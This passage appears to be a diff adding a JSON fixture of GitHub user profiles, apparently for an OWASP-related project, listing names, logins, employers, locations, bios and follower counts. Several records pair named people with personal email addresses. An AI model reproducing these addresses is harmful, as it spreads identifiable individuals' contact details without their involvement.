"2024-09-11T20:39:53.001Z", + "name": "Ivan Novikov", + "login": "d0znpp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8046150?v=4", + "company": "Wallarm", + "location": "San Francisco, CA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 54, + "public_gists_count": 10, + "public_repositories_count": 6, + "created_at": "2014-07-02T09:44:22Z", + "updated_at": "2023-08-11T23:08:19Z", + "node_id": "MDQ6VXNlcjgwNDYxNTA=", + "bio": "CEO of Wallarm", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 234, + "fields": { + "nest_created_at": "2024-09-11T20:39:53.823Z", + "nest_updated_at": "2024-09-11T20:39:53.823Z", + "name": "Luis Eduardo dos Santos Pinheiro", + "login": "luispinheiro", + "email": "lepinheiro100@terra.com.br", + "avatar_url": "https://avatars.githubusercontent.com/u/3227100?v=4", + "company": "Tenaris Confab", + "location": "Pindamonhangaba-SP", + "collaborators_count": 0, + "following_count": 152, + "followers_count": 16, + "public_gists_count": 1, + "public_repositories_count": 86, + "created_at": "2013-01-09T16:04:02Z", + "updated_at": "2024-09-08T02:45:03Z", + "node_id": "MDQ6VXNlcjMyMjcxMDA=", + "bio": "Formado em Analise de Sistemas, Graduação Latu senso em sitemas Web Java Web e Asp.net e Engenharia da Computação pela Univesp!", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 235, + "fields": { + "nest_created_at": "2024-09-11T20:39:54.658Z", + "nest_updated_at": "2024-09-11T20:39:54.658Z", + "name": "", + "login": "afonsobaco", + "email": "afonsobaco@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5458948?v=4", + "company": "", + "location": "Brasil", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2013-09-14T15:36:14Z", + "updated_at": "2024-09-09T11:59:12Z", + "node_id": "MDQ6VXNlcjU0NTg5NDg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 236, + "fields": { + "nest_created_at": "2024-09-11T20:39:55.504Z", + "nest_updated_at": "2024-09-22T20:26:34.882Z", + "name": "Jim Manico", + "login": "jmanico", + "email": "jim@manicode.com", + "avatar_url": "https://avatars.githubusercontent.com/u/531465?v=4", + "company": "Manicode Security", + "location": "Anahola, HI", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 328, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2010-12-21T04:50:18Z", + "updated_at": "2024-09-17T08:54:21Z", + "node_id": "MDQ6VXNlcjUzMTQ2NQ==", + "bio": "Jim Manico is the founder of Manicode Security where he trains developers on secure coding and security engineering. See http://www.linkedin.com/in/jmanico.", + "is_hireable": false, + "twitter_username": "manicode" + } +}, +{ + "model": "github.user", + "pk": 237, + "fields": { + "nest_created_at": "2024-09-11T20:39:57.649Z", + "nest_updated_at": "2024-09-13T04:14:50.704Z", + "name": "tkmx_nc_tkmx", + "login": "TKMX-NC-TKMX", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/103905445?v=4", + "company": "t.me/DeePSecurityOrganizacionOfc", + "location": "Ni la NASA, N.S.A , FBI ni la INTERPOL pudieron conmigo ", + "collaborators_count": 0, + "following_count": 101, + "followers_count": 14, + "public_gists_count": 4, + "public_repositories_count": 14, + "created_at": "2022-04-17T22:08:49Z", + "updated_at": "2024-03-09T22:41:07Z", + "node_id": "U_kgDOBjF4pQ", + "bio": "Software developer/Programmer/Software engineer\r\nNicaraguense ingeniero en informatica y telecomunicaciones \r\nInformatica mi pasión, Pentester y programador DEV", + "is_hireable": true, + "twitter_username": "tkmx_nc_tkmx_" + } +}, +{ + "model": "github.user", + "pk": 238, + "fields": { + "nest_created_at": "2024-09-11T20:40:58.457Z", + "nest_updated_at": "2024-09-22T17:36:00.609Z", + "name": "Shain Singh", + "login": "shsingh", + "email": "shsingh@linux.com", + "avatar_url": "https://avatars.githubusercontent.com/u/412800?v=4", + "company": "@owasp @nginx @f5", + "location": "Melbourne, Australia", + "collaborators_count": 0, + "following_count": 940, + "followers_count": 150, + "public_gists_count": 23, + "public_repositories_count": 99, + "created_at": "2010-09-23T11:27:27Z", + "updated_at": "2024-09-09T00:39:15Z", + "node_id": "MDQ6VXNlcjQxMjgwMA==", + "bio": "Principal Security Architect, OCTO, OSPO @f5 | Project Co-lead @OWASP\r\n\r\n", + "is_hireable": true, + "twitter_username": "shainsingh" + } +}, +{ + "model": "github.user", + "pk": 239, + "fields": { + "nest_created_at": "2024-09-11T20:40:59.278Z", + "nest_updated_at": "2024-09-22T17:36:01.578Z", + "name": "Sagar Bhure", + "login": "sagarbhure", + "email": "sagarbhureaerospace@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25385987?v=4", + "company": "", + "location": "Hyderabad", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 16, + "public_gists_count": 1, + "public_repositories_count": 70, + "created_at": "2017-01-27T12:38:20Z", + "updated_at": "2024-08-26T16:47:53Z", + "node_id": "MDQ6VXNlcjI1Mzg1OTg3", + "bio": "Competitive Programmer • Computer Networking • Deep Learning, AI & ML enthusiast • Blogger • Teacher on occasions, student for life!", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 240, + "fields": { + "nest_created_at": "2024-09-11T20:41:04.256Z", + "nest_updated_at": "2024-09-11T20:41:04.256Z", + "name": "Alejandro Saucedo", + "login": "axsaucedo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1447507?v=4", + "company": "@EthicalML @Zalando", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 43, + "followers_count": 364, + "public_gists_count": 3, + "public_repositories_count": 185, + "created_at": "2012-02-17T18:52:14Z", + "updated_at": "2024-07-22T07:05:58Z", + "node_id": "MDQ6VXNlcjE0NDc1MDc=", + "bio": "@Zalando Director of Eng, Science, Product & Analytics | Chair / Advisor at UN, ACM, LF, etc", + "is_hireable": true, + "twitter_username": "axsaucedo" + } +}, +{ + "model": "github.user", + "pk": 241, + "fields": { + "nest_created_at": "2024-09-11T20:41:40.057Z", + "nest_updated_at": "2024-09-22T17:36:01.268Z", + "name": "Mikołaj Kowalczyk", + "login": "mik0w", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/64902909?v=4", + "company": "@ardoq", + "location": "Oslo", + "collaborators_count": 0, + "following_count": 22, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2020-05-06T11:37:51Z", + "updated_at": "2024-09-06T11:51:09Z", + "node_id": "MDQ6VXNlcjY0OTAyOTA5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 242, + "fields": { + "nest_created_at": "2024-09-11T20:41:42.522Z", + "nest_updated_at": "2024-09-11T20:42:08.010Z", + "name": "", + "login": "techiemac", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/632991?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2011-02-22T23:49:48Z", + "updated_at": "2024-08-30T22:32:17Z", + "node_id": "MDQ6VXNlcjYzMjk5MQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 243, + "fields": { + "nest_created_at": "2024-09-11T20:41:52.503Z", + "nest_updated_at": "2024-09-22T15:38:14.946Z", + "name": "Benjamin Kereopa-Yorke", + "login": "Benjamin-KY", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/99622824?v=4", + "company": "Telstra", + "location": "Australia", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 6, + "public_gists_count": 2, + "public_repositories_count": 292, + "created_at": "2022-02-14T00:01:07Z", + "updated_at": "2024-09-14T12:41:45Z", + "node_id": "U_kgDOBfAfqA", + "bio": "Ben Kereopa-Yorke. Adventures in code and open-source collaboration.\r\n\r\nCyber Security and AI Assurance.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 244, + "fields": { + "nest_created_at": "2024-09-11T20:42:08.818Z", + "nest_updated_at": "2024-09-22T17:36:04.219Z", + "name": "Aryan Kenchappagol", + "login": "aryanxk02", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59761275?v=4", + "company": "International Institute of Information Technology, Pune", + "location": "Pune, India", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 30, + "public_gists_count": 2, + "public_repositories_count": 48, + "created_at": "2020-01-11T08:45:52Z", + "updated_at": "2024-09-17T12:00:58Z", + "node_id": "MDQ6VXNlcjU5NzYxMjc1", + "bio": "Google Summer of Code 2021 Mentee. Open Source Contributor @OWASP @CrowdSecurity @espressif @OSGeo\r\n\r\n\r\n", + "is_hireable": false, + "twitter_username": "aryan_kx" + } +}, +{ + "model": "github.user", + "pk": 245, + "fields": { + "nest_created_at": "2024-09-11T20:42:33.654Z", + "nest_updated_at": "2024-09-11T20:42:33.654Z", + "name": "Dimitrios Kapsalis", + "login": "kapsolas", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/795878?v=4", + "company": "", + "location": "USA", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2011-05-18T13:59:32Z", + "updated_at": "2024-04-18T15:15:11Z", + "node_id": "MDQ6VXNlcjc5NTg3OA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 246, + "fields": { + "nest_created_at": "2024-09-11T20:42:41.688Z", + "nest_updated_at": "2024-09-22T17:35:58.893Z", + "name": "", + "login": "dferri", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17934771?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2016-03-18T19:11:40Z", + "updated_at": "2024-09-17T15:04:19Z", + "node_id": "MDQ6VXNlcjE3OTM0Nzcx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 247, + "fields": { + "nest_created_at": "2024-09-11T20:43:41.235Z", + "nest_updated_at": "2024-09-22T17:37:08.144Z", + "name": "Armorse Wang", + "login": "taype", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/117689950?v=4", + "company": "", + "location": "GuangZhou", + "collaborators_count": 0, + "following_count": 99, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2022-11-07T22:17:18Z", + "updated_at": "2024-08-25T04:15:39Z", + "node_id": "U_kgDOBwPOXg", + "bio": "LLM, RAG, Agents, Prompts and 2B&2G LLM Application Platform", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 248, + "fields": { + "nest_created_at": "2024-09-11T20:43:57.447Z", + "nest_updated_at": "2024-09-22T19:45:38.069Z", + "name": "Matteo Meucci", + "login": "MatOwasp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26579136?v=4", + "company": "IMQ Minded Security", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2017-03-21T17:30:48Z", + "updated_at": "2024-08-05T09:27:51Z", + "node_id": "MDQ6VXNlcjI2NTc5MTM2", + "bio": "Since 2002, Matteo has been a pivotal contributor to the OWASP project (2022 Lifetime membership) . 23+ exp on AppSec, cofounder and CEO IMQ Minded Security.", + "is_hireable": false, + "twitter_username": "matteo_meucci" + } +}, +{ + "model": "github.user", + "pk": 249, + "fields": { + "nest_created_at": "2024-09-11T20:44:07.765Z", + "nest_updated_at": "2024-09-22T20:31:22.294Z", + "name": "Zoe Braiterman", + "login": "zbraiterman", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17055910?v=4", + "company": "", + "location": "New York, NY", + "collaborators_count": 0, + "following_count": 289, + "followers_count": 93, + "public_gists_count": 1, + "public_repositories_count": 229, + "created_at": "2016-02-03T23:49:32Z", + "updated_at": "2024-07-12T15:54:17Z", + "node_id": "MDQ6VXNlcjE3MDU1OTEw", + "bio": "Data Science, Engineering, Information Security\r\n", + "is_hireable": true, + "twitter_username": "zbraiterman" + } +}, +{ + "model": "github.user", + "pk": 250, + "fields": { + "nest_created_at": "2024-09-11T20:44:08.165Z", + "nest_updated_at": "2024-09-22T20:30:05.485Z", + "name": "Liz Frenz", + "login": "lizfrenz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43452901?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-09-20T19:28:34Z", + "updated_at": "2024-09-17T02:40:57Z", + "node_id": "MDQ6VXNlcjQzNDUyOTAx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 251, + "fields": { + "nest_created_at": "2024-09-11T20:44:19.186Z", + "nest_updated_at": "2024-09-22T17:37:47.069Z", + "name": "Carlos A. N. de Castilho", + "login": "cancastilho", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/952143?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 47, + "created_at": "2011-08-01T16:48:31Z", + "updated_at": "2024-03-30T19:33:33Z", + "node_id": "MDQ6VXNlcjk1MjE0Mw==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 252, + "fields": { + "nest_created_at": "2024-09-11T20:44:52.934Z", + "nest_updated_at": "2024-09-22T20:22:49.918Z", + "name": "David A. Wheeler", + "login": "david-a-wheeler", + "email": "dwheeler@dwheeler.com", + "avatar_url": "https://avatars.githubusercontent.com/u/813150?v=4", + "company": "Linux Foundation", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 376, + "public_gists_count": 1, + "public_repositories_count": 86, + "created_at": "2011-05-26T22:24:51Z", + "updated_at": "2024-09-02T21:25:45Z", + "node_id": "MDQ6VXNlcjgxMzE1MA==", + "bio": "My work title is \"Director of Open Source Supply Chain Security\" at the Linux Foundation. Much of this isn't work though.", + "is_hireable": false, + "twitter_username": "drdavidawheeler" + } +}, +{ + "model": "github.user", + "pk": 253, + "fields": { + "nest_created_at": "2024-09-11T20:44:55.464Z", + "nest_updated_at": "2024-09-11T20:44:55.464Z", + "name": "j-k", + "login": "06kellyjac", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9866621?v=4", + "company": "@controlplaneio", + "location": "UK", + "collaborators_count": 0, + "following_count": 57, + "followers_count": 50, + "public_gists_count": 5, + "public_repositories_count": 93, + "created_at": "2014-11-20T15:51:43Z", + "updated_at": "2024-09-05T14:28:23Z", + "node_id": "MDQ6VXNlcjk4NjY2MjE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 254, + "fields": { + "nest_created_at": "2024-09-11T20:44:56.337Z", + "nest_updated_at": "2024-09-11T20:44:56.337Z", + "name": "kannkyo", + "login": "kannkyo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15080890?v=4", + "company": "", + "location": "Japan", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 5, + "public_gists_count": 9, + "public_repositories_count": 58, + "created_at": "2015-10-12T00:39:24Z", + "updated_at": "2024-08-13T01:02:50Z", + "node_id": "MDQ6VXNlcjE1MDgwODkw", + "bio": "姓は閑、名は居。kannkyo(閑居)。自称フルスタックエンジニア。\r\n\r\nFull stack software engineer. UX Design, frontend, backend and infrastructures. I’ll do all of them.", + "is_hireable": false, + "twitter_username": "kannkyoshi" + } +}, +{ + "model": "github.user", + "pk": 255, + "fields": { + "nest_created_at": "2024-09-11T20:45:02.104Z", + "nest_updated_at": "2024-09-22T20:27:56.503Z", + "name": "Deleted user", + "login": "ghost", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10137?v=4", + "company": "", + "location": "Nothing to see here, move along.", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 10244, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2008-05-13T06:14:25Z", + "updated_at": "2018-04-10T17:22:33Z", + "node_id": "MDQ6VXNlcjEwMTM3", + "bio": "Hi, I'm @ghost! I take the place of user accounts that have been deleted.\n:ghost:\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 256, + "fields": { + "nest_created_at": "2024-09-11T20:45:46.581Z", + "nest_updated_at": "2024-09-22T17:39:13.028Z", + "name": "", + "login": "Tommythetipper", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25929189?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 4, + "public_repositories_count": 2, + "created_at": "2017-02-21T13:27:51Z", + "updated_at": "2024-09-20T11:46:14Z", + "node_id": "MDQ6VXNlcjI1OTI5MTg5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 257, + "fields": { + "nest_created_at": "2024-09-11T20:45:55.728Z", + "nest_updated_at": "2024-09-22T17:42:29.813Z", + "name": "", + "login": "mikemccamon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48743106?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 22, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2019-03-20T03:04:49Z", + "updated_at": "2021-08-09T18:15:11Z", + "node_id": "MDQ6VXNlcjQ4NzQzMTA2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 258, + "fields": { + "nest_created_at": "2024-09-11T20:46:00.028Z", + "nest_updated_at": "2024-09-22T20:25:37.912Z", + "name": "Steven van der Baan", + "login": "vdbaan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2207005?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 11, + "public_gists_count": 1, + "public_repositories_count": 54, + "created_at": "2012-08-23T20:31:41Z", + "updated_at": "2024-09-14T22:54:05Z", + "node_id": "MDQ6VXNlcjIyMDcwMDU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 259, + "fields": { + "nest_created_at": "2024-09-11T20:46:06.676Z", + "nest_updated_at": "2024-09-11T20:46:06.676Z", + "name": "Oussama Osman", + "login": "Oussamaosman02", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/109099115?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 33, + "followers_count": 18, + "public_gists_count": 0, + "public_repositories_count": 62, + "created_at": "2022-07-11T16:59:07Z", + "updated_at": "2024-08-28T07:33:22Z", + "node_id": "U_kgDOBoC4aw", + "bio": "I'm a student that love to code.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 260, + "fields": { + "nest_created_at": "2024-09-11T20:46:07.515Z", + "nest_updated_at": "2024-09-11T20:46:07.515Z", + "name": "", + "login": "NXXG1024", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/85858878?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2021-06-14T03:57:11Z", + "updated_at": "2024-09-01T11:32:52Z", + "node_id": "MDQ6VXNlcjg1ODU4ODc4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 261, + "fields": { + "nest_created_at": "2024-09-11T20:46:08.347Z", + "nest_updated_at": "2024-09-11T20:46:08.347Z", + "name": "", + "login": "291247", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/132583150?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 25, + "followers_count": 29, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-05-04T13:40:34Z", + "updated_at": "2023-11-28T08:34:20Z", + "node_id": "U_kgDOB-cO7g", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 262, + "fields": { + "nest_created_at": "2024-09-11T20:46:09.167Z", + "nest_updated_at": "2024-09-11T20:46:10.823Z", + "name": "Antonio Venes Gonzalez Craig", + "login": "tonyvg2013", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/67227738?v=4", + "company": "Southern New Hampshire University ", + "location": "New Hampshire, United States ", + "collaborators_count": 0, + "following_count": 60, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2020-06-21T12:12:59Z", + "updated_at": "2024-06-30T12:12:01Z", + "node_id": "MDQ6VXNlcjY3MjI3NzM4", + "bio": "", + "is_hireable": false, + "twitter_username": "tonyvg2013" + } +}, +{ + "model": "github.user", + "pk": 263, + "fields": { + "nest_created_at": "2024-09-11T20:46:11.670Z", + "nest_updated_at": "2024-09-11T20:46:11.670Z", + "name": "", + "login": "elenastanul87", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28634785?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-05-11T20:14:19Z", + "updated_at": "2024-06-04T15:26:39Z", + "node_id": "MDQ6VXNlcjI4NjM0Nzg1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 264, + "fields": { + "nest_created_at": "2024-09-11T20:46:12.506Z", + "nest_updated_at": "2024-09-13T04:18:07.587Z", + "name": "Yaseen", + "login": "yaseenaljamal", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/129287372?v=4", + "company": "@YAJ-International ", + "location": "United States of America ", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 86, + "created_at": "2023-03-29T11:49:11Z", + "updated_at": "2024-08-05T16:44:21Z", + "node_id": "U_kgDOB7TEzA", + "bio": "Contracting \r\n@yaseenaljamalgov ", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 265, + "fields": { + "nest_created_at": "2024-09-11T20:46:17.223Z", + "nest_updated_at": "2024-09-22T20:29:58.514Z", + "name": "Dirk Wetter", + "login": "drwetter", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8036727?v=4", + "company": "", + "location": "Hamburg, Germany", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 437, + "public_gists_count": 1, + "public_repositories_count": 39, + "created_at": "2014-07-01T11:53:42Z", + "updated_at": "2024-09-06T16:54:51Z", + "node_id": "MDQ6VXNlcjgwMzY3Mjc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 266, + "fields": { + "nest_created_at": "2024-09-11T20:46:19.759Z", + "nest_updated_at": "2024-09-22T16:34:53.837Z", + "name": "Danishka Navin", + "login": "danishka", + "email": "danishka@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/178024?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2010-01-07T15:56:53Z", + "updated_at": "2024-08-28T11:20:38Z", + "node_id": "MDQ6VXNlcjE3ODAyNA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 267, + "fields": { + "nest_created_at": "2024-09-11T20:46:20.586Z", + "nest_updated_at": "2024-09-22T17:39:49.745Z", + "name": "Rozina Aamir", + "login": "rozina-aamir", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68275554?v=4", + "company": "", + "location": "UK", + "collaborators_count": 0, + "following_count": 164, + "followers_count": 17, + "public_gists_count": 0, + "public_repositories_count": 31, + "created_at": "2020-07-14T09:32:34Z", + "updated_at": "2024-08-16T17:38:41Z", + "node_id": "MDQ6VXNlcjY4Mjc1NTU0", + "bio": "artist + coder", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 268, + "fields": { + "nest_created_at": "2024-09-11T21:07:22.725Z", + "nest_updated_at": "2024-09-22T17:40:04.828Z", + "name": "", + "login": "KhanalGaurab", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/122043020?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2023-01-05T16:51:30Z", + "updated_at": "2023-07-26T16:58:14Z", + "node_id": "U_kgDOB0Y6jA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 269, + "fields": { + "nest_created_at": "2024-09-11T21:07:31.332Z", + "nest_updated_at": "2024-09-22T17:40:12.571Z", + "name": "", + "login": "engihive", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55435569?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-09-17T08:57:57Z", + "updated_at": "2019-09-17T08:57:58Z", + "node_id": "MDQ6VXNlcjU1NDM1NTY5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 270, + "fields": { + "nest_created_at": "2024-09-11T21:08:24.536Z", + "nest_updated_at": "2024-09-22T19:32:13.105Z", + "name": "Jonathan Marcil", + "login": "jmarcil", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/830334?v=4", + "company": "@OWASP", + "location": "Montreal, Canada", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 30, + "public_gists_count": 2, + "public_repositories_count": 15, + "created_at": "2011-06-05T04:36:22Z", + "updated_at": "2024-08-19T14:35:36Z", + "node_id": "MDQ6VXNlcjgzMDMzNA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 271, + "fields": { + "nest_created_at": "2024-09-11T21:08:29.548Z", + "nest_updated_at": "2024-09-22T20:24:53.500Z", + "name": "Omer Levi Hevroni", + "login": "omerlh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6730584?v=4", + "company": "@goledge", + "location": "Tel Aviv", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 87, + "public_gists_count": 23, + "public_repositories_count": 238, + "created_at": "2014-02-19T19:37:33Z", + "updated_at": "2024-09-03T05:57:30Z", + "node_id": "MDQ6VXNlcjY3MzA1ODQ=", + "bio": "Engineer @goledge , OSS maintainer and a proud father", + "is_hireable": false, + "twitter_username": "omerlh" + } +}, +{ + "model": "github.user", + "pk": 272, + "fields": { + "nest_created_at": "2024-09-11T21:08:30.388Z", + "nest_updated_at": "2024-09-22T17:41:10.107Z", + "name": "Adam Baldwin", + "login": "evilpacket", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/115769?v=4", + "company": "", + "location": "PNW", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 588, + "public_gists_count": 43, + "public_repositories_count": 56, + "created_at": "2009-08-16T06:29:26Z", + "updated_at": "2024-09-16T20:24:25Z", + "node_id": "MDQ6VXNlcjExNTc2OQ==", + "bio": "Hacker. Pioneered BlindXSS, Remote git/hg/bzr Pillaging, and SECURITY.md. ", + "is_hireable": false, + "twitter_username": "adam_baldwin" + } +}, +{ + "model": "github.user", + "pk": 273, + "fields": { + "nest_created_at": "2024-09-11T21:08:31.214Z", + "nest_updated_at": "2024-09-22T18:28:18.850Z", + "name": "Matt Konda", + "login": "mkonda", + "email": "mkonda@jemurai.com", + "avatar_url": "https://avatars.githubusercontent.com/u/550691?v=4", + "company": "Jemurai", + "location": "Dallas", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 34, + "public_gists_count": 2, + "public_repositories_count": 21, + "created_at": "2011-01-06T17:48:25Z", + "updated_at": "2024-09-11T21:17:25Z", + "node_id": "MDQ6VXNlcjU1MDY5MQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "mkonda" + } +}, +{ + "model": "github.user", + "pk": 274, + "fields": { + "nest_created_at": "2024-09-11T21:08:32.409Z", + "nest_updated_at": "2024-09-22T20:27:58.162Z", + "name": "Liran Tal", + "login": "lirantal", + "email": "liran.tal@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/316371?v=4", + "company": "@snyk", + "location": "Tel Aviv, Israel", + "collaborators_count": 0, + "following_count": 935, + "followers_count": 2064, + "public_gists_count": 28, + "public_repositories_count": 414, + "created_at": "2010-06-28T11:10:04Z", + "updated_at": "2024-09-21T14:28:51Z", + "node_id": "MDQ6VXNlcjMxNjM3MQ==", + "bio": "🦄 Node.js Secure Coding: nodejs-security.com\r\n\r\n🌟 @GitHub Star\r\n🏅 @OpenJS Pathfinder award for Security\r\n🥑 DevRel at @snyksec", + "is_hireable": true, + "twitter_username": "liran_tal" + } +}, +{ + "model": "github.user", + "pk": 275, + "fields": { + "nest_created_at": "2024-09-11T21:08:34.962Z", + "nest_updated_at": "2024-09-11T21:08:34.962Z", + "name": "Lance R. Vick", + "login": "lrvick", + "email": "lance@distrust.co", + "avatar_url": "https://avatars.githubusercontent.com/u/69200?v=4", + "company": "Distrust, LLC", + "location": "Silicon Valley, CA", + "collaborators_count": 0, + "following_count": 118, + "followers_count": 385, + "public_gists_count": 144, + "public_repositories_count": 126, + "created_at": "2009-04-01T02:54:07Z", + "updated_at": "2024-08-04T17:46:33Z", + "node_id": "MDQ6VXNlcjY5MjAw", + 